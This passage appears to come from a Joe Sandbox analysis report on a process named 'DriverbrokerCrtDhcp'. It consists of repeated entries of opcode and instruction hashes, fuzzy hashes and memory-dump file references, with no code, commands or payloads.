                                                                                      • Opcode ID: 358134f63e1dfbc6f3584955dbb210fce928ce60078a825bebf8fe0a7f4514ac
                                                                                      • Instruction ID: 7a8fc74d77ae50cfa647d7f37e21bfa544ea8b3f59861908acb38cc07a83cd94
                                                                                      • Opcode Fuzzy Hash: 358134f63e1dfbc6f3584955dbb210fce928ce60078a825bebf8fe0a7f4514ac
                                                                                      • Instruction Fuzzy Hash: 7C311630E1C95ACFEB98DB5584A96BDB7A1FF46300F5001BBD20ED6189DE3DA940AB41
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 15463f4b944466ec9a63358c424b5caf93737e9c857332ea6d693b0c4fd97edc
                                                                                      • Instruction ID: 19ff28db2c193dc15a95209feaee55dddc17b95dc8fda2ab4b5fbe8e42eca872
                                                                                      • Opcode Fuzzy Hash: 15463f4b944466ec9a63358c424b5caf93737e9c857332ea6d693b0c4fd97edc
                                                                                      • Instruction Fuzzy Hash: 7D21F563F1CA8A4FE754A75898A22F8F7E1EF4B310F18027AD14DC6282DE1C68069250
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: af8a4115b67e321608390fb72d63e2868bd4e038509efd4a370a94e24247602f
                                                                                      • Instruction ID: 206cd3e2f9d2a00f68f03d13821bc96e51e17092109aa95b474b7d3daf714071
                                                                                      • Opcode Fuzzy Hash: af8a4115b67e321608390fb72d63e2868bd4e038509efd4a370a94e24247602f
                                                                                      • Instruction Fuzzy Hash: EC21E471F0C5494FEB58A75948A22BC77E0FF46311F1401FAD14EC7683DA2CA8069354
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 623e42b32e433315a8b8c13aaf4e471dafed644f21957fbc954c8f964a5e0404
                                                                                      • Instruction ID: 335e916700f87957a6b8f4b796918545d45cbc20161061d3fa61a92ef6781567
                                                                                      • Opcode Fuzzy Hash: 623e42b32e433315a8b8c13aaf4e471dafed644f21957fbc954c8f964a5e0404
                                                                                      • Instruction Fuzzy Hash: 7531F511A1C5A64BE729C65888B4DB47B51FF4730172C47B6D19ACB48BC82CB881EB41
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c67adf0fd836c53dfb5d2df25898c6f9e7a3be264fea39970530b0fa577407af
                                                                                      • Instruction ID: 282a0efc143958298bbf87bf95f64f76c57b97153c2a8c7e1b8e1226585698b0
                                                                                      • Opcode Fuzzy Hash: c67adf0fd836c53dfb5d2df25898c6f9e7a3be264fea39970530b0fa577407af
                                                                                      • Instruction Fuzzy Hash: 7731E820A1C5964AF729861548B457CFBA1EF53305F1846FBC58BCB4DBC42CB881EB41
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 369f36353177fdd5ed1caba3988cdcf2b932eec577c5364a598dca1a76be50e7
                                                                                      • Instruction ID: 84425e26cf783511868351b34440b7876b8416527417ea23682461c307114e89
                                                                                      • Opcode Fuzzy Hash: 369f36353177fdd5ed1caba3988cdcf2b932eec577c5364a598dca1a76be50e7
                                                                                      • Instruction Fuzzy Hash: 6F31FB11A1C5A74BE72A821644F19BC7B91EF5330471D46FBD59ADB487C86CB881E3C1
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 60ff91a73f297be14985ab912834ace2fecb5dda09e08e134948376f044f6764
                                                                                      • Instruction ID: 556636fdfa2e0f2f7350d7b6185731ef7e5c9f66a21301d0dcd01b897c9b5d85
                                                                                      • Opcode Fuzzy Hash: 60ff91a73f297be14985ab912834ace2fecb5dda09e08e134948376f044f6764
                                                                                      • Instruction Fuzzy Hash: 63319D10A1C6D64AF329C31548B04B97B90EF93321B1C87BBC58BEB097CA2CB881E741
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 763c47194fc3dfba489f55eec2a229f90ceb97e93ee91e31dbffc8502b91577b
                                                                                      • Instruction ID: 9443e725f4ae20e3cd7b7b86e4ca9f0e7773f0b40c7ef49aea2d376a87d22794
                                                                                      • Opcode Fuzzy Hash: 763c47194fc3dfba489f55eec2a229f90ceb97e93ee91e31dbffc8502b91577b
                                                                                      • Instruction Fuzzy Hash: EE215C35F1C98D8FDB95DB98C8A05ADBBB1FF5A300F1400BAD10EE72A1DE28A8059701
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: afcb3a98971c6d8cbad1238a4b738b8b2b6e49506f2c6d98b3972834ca6577b0
                                                                                      • Instruction ID: 67e23847400e63679ada7720d2e7b13ffd013c59e917fd1571991efb3e6f41ed
                                                                                      • Opcode Fuzzy Hash: afcb3a98971c6d8cbad1238a4b738b8b2b6e49506f2c6d98b3972834ca6577b0
                                                                                      • Instruction Fuzzy Hash: A221D771E0891D9FDF98DB58D4A5AEDB7B1FF69300F1442AED00EE3291CA35A9818B40
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 886e9f556a31608cbab356fdc62ddac4f7a3b2f59ea6007d802ab87342c2eb45
                                                                                      • Instruction ID: 7f43eaf2092c9334755d5bb982370a606d35bcaac98d66b1b576c008e9f91d42
                                                                                      • Opcode Fuzzy Hash: 886e9f556a31608cbab356fdc62ddac4f7a3b2f59ea6007d802ab87342c2eb45
                                                                                      • Instruction Fuzzy Hash: 5621D971E0891D9FDF98DB58C4A5AEDB7B1FF69300F0401AAD00EE3291CE35A981CB40
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: da758adc2cc6dfe196402f8794cbec1e694c8d775403528b88b28d849057c0d9
                                                                                      • Instruction ID: b1d7244de7effc519a779e0603f3268a29201a5870dac3bd0fb592677c4bb1a1
                                                                                      • Opcode Fuzzy Hash: da758adc2cc6dfe196402f8794cbec1e694c8d775403528b88b28d849057c0d9
                                                                                      • Instruction Fuzzy Hash: C2210472F0DA894FEB58E6A994A62EC77E0EF46350F0001BFC14DC3287CE2C68428351
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2713414957.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34890000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 84c8d59224362f0a18560aa1b290a989303af6f161498b29470c705bd4d80c0d
                                                                                      • Instruction ID: be9598fb79a199395482eb344ef67ebffd37f196b59efd1ece86f027734a8e0b
                                                                                      • Opcode Fuzzy Hash: 84c8d59224362f0a18560aa1b290a989303af6f161498b29470c705bd4d80c0d
                                                                                      • Instruction Fuzzy Hash: 3D216551B0DB5606E379562C6CB12757FE1DF87201F1C02BAE5DAC22C3ED1DA80563D0
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 630be458e0697c9687f2618d89b42cfdf9ceb696f50f59dc613e8af30b1124f4
                                                                                      • Instruction ID: 61fad4f89dd616c0386cbb8c44e190c499f82f695bc9b66a2a5054c959d2dd46
                                                                                      • Opcode Fuzzy Hash: 630be458e0697c9687f2618d89b42cfdf9ceb696f50f59dc613e8af30b1124f4
                                                                                      • Instruction Fuzzy Hash: AE213A20A1C46F9BE6788794D0706B87752FF51700B2487BAD14B8B0CBC82DB882B751
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7e48aea08ae0f215e70dbc8aaeef1ab57ac5f3f115ff5ea4815aecd578c91b78
                                                                                      • Instruction ID: 1c2888ccebaae6c05e7cb480a568f83e28485e10980b27de97df4ae6f90f9e57
                                                                                      • Opcode Fuzzy Hash: 7e48aea08ae0f215e70dbc8aaeef1ab57ac5f3f115ff5ea4815aecd578c91b78
                                                                                      • Instruction Fuzzy Hash: 2221D611E6C46A4FE778931445B44B47761FF92301B1C87BAD14BCB49FCA2CBC81A781
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c2a921676d6d489ded52c3bda5e5def85af5ed8ba651c893795452476ae4c9f2
                                                                                      • Instruction ID: c10ad297646e7d59976efb11980fa5d39c3e5caf5972dcdc95af0c74631f0e3b
                                                                                      • Opcode Fuzzy Hash: c2a921676d6d489ded52c3bda5e5def85af5ed8ba651c893795452476ae4c9f2
                                                                                      • Instruction Fuzzy Hash: 0A219F32E1894D8FDB98DB98C8A05FCB7B1FF59300F14117AD10AE3292DE3968019B41
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c542a66e9be389e1bf19088b5be688b3caf82033840cfc5d3020b137634dab38
                                                                                      • Instruction ID: 10c44d1517279d353b12b5209854d92586ec7e07cac3ab423ea3b41697c1332a
                                                                                      • Opcode Fuzzy Hash: c542a66e9be389e1bf19088b5be688b3caf82033840cfc5d3020b137634dab38
                                                                                      • Instruction Fuzzy Hash: BC210971E196099FDB98DB58C4B6AADB7B1FF59311F0081BED10EE7291CE38A9418B40
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 68a2b4cb0b171b28dd06d067e83aa608e7c6f0554a4e5fc4ed2805d217e71652
                                                                                      • Instruction ID: 3afc9eddcc1605fbd74e2f9d8ab89d7cd393c0aa83c3e903b7e8fbd1b84d3ad8
                                                                                      • Opcode Fuzzy Hash: 68a2b4cb0b171b28dd06d067e83aa608e7c6f0554a4e5fc4ed2805d217e71652
                                                                                      • Instruction Fuzzy Hash: 16217511A5C4665BE778C64884F4DB47391FF96301B2C4776D55BCB58AC83CB9C1EE80
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 00d01bcddde251cfb0d21c98554438744f4be0b6a06335927b631e6110cd088a
                                                                                      • Instruction ID: f88b3066bddaf8531c377fddccb84ed229cfc1e7c57b0b3b9a93190a3564328b
                                                                                      • Opcode Fuzzy Hash: 00d01bcddde251cfb0d21c98554438744f4be0b6a06335927b631e6110cd088a
                                                                                      • Instruction Fuzzy Hash: 0821C611E2C46A4BF678960885F05B47791FF92301B1C47B9D24BCB58ECA2CFC81A781
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e68288804dcdcc499fb925400d3ea5505f1812f7dd8e2708eab77fa057a48681
                                                                                      • Instruction ID: 56e7c6f0151a0ca02dbf4013a06ad653bbbd4dad6a19cc17a2eecac983f97501
                                                                                      • Opcode Fuzzy Hash: e68288804dcdcc499fb925400d3ea5505f1812f7dd8e2708eab77fa057a48681
                                                                                      • Instruction Fuzzy Hash: C111DA20B2C4664AF678960984F45BCF7E1EF52305F1446F7D59BCB5CAC82CB881AB80
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1d6958679b56a978da7f296440b2c6def2b17dd111cdfedda95ed3f7bd393eb4
                                                                                      • Instruction ID: eb1f12172984c92120f4e4860d26d6cb553341c3abbeb4eeb77be9d9f6bb18ac
                                                                                      • Opcode Fuzzy Hash: 1d6958679b56a978da7f296440b2c6def2b17dd111cdfedda95ed3f7bd393eb4
                                                                                      • Instruction Fuzzy Hash: 2111BB11A1C46B4AEA2CD60744F09BC7251FF92305B1946F7D15BD748AC83CF881E7C0
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2713414957.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34890000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ccc6efbdedf29b1d35752a75c40f299b6485424312bc3b94fd964e833534a1c5
                                                                                      • Instruction ID: 82a6d71b7c5a76e3f338251d61baf37a2944f7ef6cb195766f05363ea8bed638
                                                                                      • Opcode Fuzzy Hash: ccc6efbdedf29b1d35752a75c40f299b6485424312bc3b94fd964e833534a1c5
                                                                                      • Instruction Fuzzy Hash: C721A135B0C6898FE702EBB888A51DDBFB0EF82311F1545B7C254C7182EA3856599751
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2713414957.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34890000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0716408e61076159a84314862cd6681fb33e705cfd7ebd8c425d897aae2561ea
                                                                                      • Instruction ID: 09d47c53ce566c8dddcaeeef13a7734bb4501ac8b8772ff3643ed75c31a3e707
                                                                                      • Opcode Fuzzy Hash: 0716408e61076159a84314862cd6681fb33e705cfd7ebd8c425d897aae2561ea
                                                                                      • Instruction Fuzzy Hash: F6112B3291D7884FD761AB3888591EA7FF0FF4B219F10017FE5DAD3192DA3898059792
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e566597d1fe9f8391e6ebee256062e9b547142dfad1f7f3958440f4eea098881
                                                                                      • Instruction ID: 55a236cfe52b22e73bdd9afeaeae3c36a4cd8d4b87cb0e2899e3ff8ae6030e4c
                                                                                      • Opcode Fuzzy Hash: e566597d1fe9f8391e6ebee256062e9b547142dfad1f7f3958440f4eea098881
                                                                                      • Instruction Fuzzy Hash: 6311E331B0990A4FDBA4EB6494A15FA73A5FF46310B04063BD50EC3582CE3CB40593A0
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e58131ad381f01e9ed2bc0d1202383e458ae1f57105b5a5b81a5281f41195937
                                                                                      • Instruction ID: bb15432e1eb186433f5df46e73078a0517d11942119ff8f9f212b1ac2bb24f24
                                                                                      • Opcode Fuzzy Hash: e58131ad381f01e9ed2bc0d1202383e458ae1f57105b5a5b81a5281f41195937
                                                                                      • Instruction Fuzzy Hash: 1911E332B08D099FEB65EBA4A4A15FA73A4EF56310B04073AD50EC35C2CF3CB40592A0
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 99002af749d0fc1d9d15ce80b42fac54babfd4aeb585042a902eb5ccab0f4565
                                                                                      • Instruction ID: bee6cf291675aaef4aad64467439be3c0531572590604a32dbc0065228a8da85
                                                                                      • Opcode Fuzzy Hash: 99002af749d0fc1d9d15ce80b42fac54babfd4aeb585042a902eb5ccab0f4565
                                                                                      • Instruction Fuzzy Hash: 1311E731B189094FDB68EB6594A15FE73E0EF56351B40057BD54EC35C2CE3CB8099390
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 08fd06ce511b5b38b7223b1639ecbed02915f68029361c9bab78cc31c3cd52ee
                                                                                      • Instruction ID: da7a2a68125109dae6c38addd248c4685192da9ff84e646e1988f8044c29d043
                                                                                      • Opcode Fuzzy Hash: 08fd06ce511b5b38b7223b1639ecbed02915f68029361c9bab78cc31c3cd52ee
                                                                                      • Instruction Fuzzy Hash: C511C130B19A098FDB64AA6594A15FE73B1FF56351F00067BD54EC3582CE2CB40992A0
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 086b38e5bf7d09ba51295f493b9b27c318a54f06038b288c29b4c883cfa0747c
                                                                                      • Instruction ID: e98afdaa4e0fc97f10b6d8f80bf2c5bc588690a4b730a4ef1587c2758467c4c9
                                                                                      • Opcode Fuzzy Hash: 086b38e5bf7d09ba51295f493b9b27c318a54f06038b288c29b4c883cfa0747c
                                                                                      • Instruction Fuzzy Hash: E4014431F086095BE7A4926944A86BD3AE2DF8B341F0400B7E10EE3291DF5C7C069394
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: dc6dd1bbf73a1abcc35f9ac0d8738cf597e4d4cfdb5e67aebed5b4ffe6702f34
                                                                                      • Instruction ID: d2ea3ec42b3ccf2a05bf6845ccddb82acb0f1a9c35de21e0ba362991cbd0a002
                                                                                      • Opcode Fuzzy Hash: dc6dd1bbf73a1abcc35f9ac0d8738cf597e4d4cfdb5e67aebed5b4ffe6702f34
                                                                                      • Instruction Fuzzy Hash: C71108323099068FEB199E54D4A16E533A4EF56351F14033ADA0DC76C1CB3DA5508750
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f8b15b5399f78ea44ba2f098df72b99750ed763b150d91dbff38315e06a4364a
                                                                                      • Instruction ID: e57d17d164bcbcc39741ed9543e8c06323add30820aa327af1f6bfa54c3a9436
                                                                                      • Opcode Fuzzy Hash: f8b15b5399f78ea44ba2f098df72b99750ed763b150d91dbff38315e06a4364a
                                                                                      • Instruction Fuzzy Hash: BE11663130950A8FEB289E08D4A16ED33A4EF56361F10017BEA0DC72D1CF3DA8408750
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1c18cc8e071fda45d7bb7231ac9b764a93cb52198dbe5ab21e25e4d69d36d907
                                                                                      • Instruction ID: 27a4017c14dfefcb8faa30ef48cb3cb17205a8e93c44cc4a2ed46cd270952386
                                                                                      • Opcode Fuzzy Hash: 1c18cc8e071fda45d7bb7231ac9b764a93cb52198dbe5ab21e25e4d69d36d907
                                                                                      • Instruction Fuzzy Hash: 5111043130950A8FEB299E18D8A16ED33A4FF57361F1001BBEA0DC76C1CF2DA8658760
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0be449c60de8b24269de54b9618c430c59309d9c3f956be69b72d19b461c6cf3
                                                                                      • Instruction ID: 860f2ddaeb357c03d6d1036312ddc6e1287a2bd3d8511a7f78767ea8a4bfec35
                                                                                      • Opcode Fuzzy Hash: 0be449c60de8b24269de54b9618c430c59309d9c3f956be69b72d19b461c6cf3
                                                                                      • Instruction Fuzzy Hash: D211F630A1891D8BDB98DB58C4B5ABDB7B1FF59311F4441BED10EE3691CE39A9808B40
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2713414957.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34890000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 703597a7cddc7df41a494a466d37a7739582855dbdb56b8392b4c0e0e8e5139c
                                                                                      • Instruction ID: ce2d4b6b5d1ed071ac878a5c9716a91f9c37ad85bce7d332edca09275ac910f2
                                                                                      • Opcode Fuzzy Hash: 703597a7cddc7df41a494a466d37a7739582855dbdb56b8392b4c0e0e8e5139c
                                                                                      • Instruction Fuzzy Hash: E701262198D6C21FE32A97B04CB19A63FD4DF8711070E01FAD189CB5E3CC4D5886C391
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2713414957.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34890000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 16845b040a83f0669127dfe6eccf85388e00daa5f602290bad752e61dd247e3b
